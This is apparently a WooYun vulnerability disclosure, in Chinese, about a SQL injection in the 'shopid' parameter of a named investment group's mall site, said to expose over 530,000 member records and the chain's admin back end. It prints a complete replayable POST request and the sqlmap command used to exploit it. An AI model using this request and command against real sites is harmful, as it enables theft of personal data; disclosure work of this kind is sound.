某大型投资集团网站高危SQL注射50W业主隐私、全国连锁后台全面告急 | wooyun-2014-079262

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2014-079262

漏洞标题：

某大型投资集团网站高危SQL注射50W业主隐私、全国连锁后台全面告急

漏洞详情

披露状态：

2014-10-14：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-11-28：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

某大型投资集团网站高危SQL注射，50W业主隐私、全国连锁后台全面告急

详细说明：

某大型投资集团网站高危SQL注射，50W业主隐私、全国连锁后台全面告急

漏洞证明：

存在POST注入：
注射参数：shopid
SELECT COUNT(*) FROM mall.mallbuilder_member ： 536859
可以看到，超过53W的投资业主隐私泄露
具体注射数据包，保存为post.txt ：

POST /?act=ajax&m=hospital HTTP/1.1
Host: www.buynow.com.cn
User-Agent: Baiduspider
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=lonj22mp4edi11kbsg6okkpn33; branchid=1; __utma=1.1148650936.1413012066.1413012066.1413012066.1; __utmc=1; __utmz=1.1413012066.1.1.utmcsr=yuanfeng021.com|utmccn=(referral)|utmcmd=referral|utmcct=/case.html; Hm_lvt_566fc2e7652c3d31e6a064bd575f213b=1413012067; Hm_lpvt_566fc2e7652c3d31e6a064bd575f213b=1413012067; __auc=e7d51f4c148fe15177cce0722ac; isCloseLayer=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 9
shopid=15

sqlmap下：

sqlmap.py -r post.txt

给出全国连锁管理后台数据

修复方案：

紧急修复

版权声明：转载请注明来源黑暗游侠@乌云

漏洞回应

厂商回应：

未能联系到厂商或者厂商积极拒绝

漏洞Rank：8 (WooYun评价)

WooYun.org

漏洞概要 关注数(24) 关注此漏洞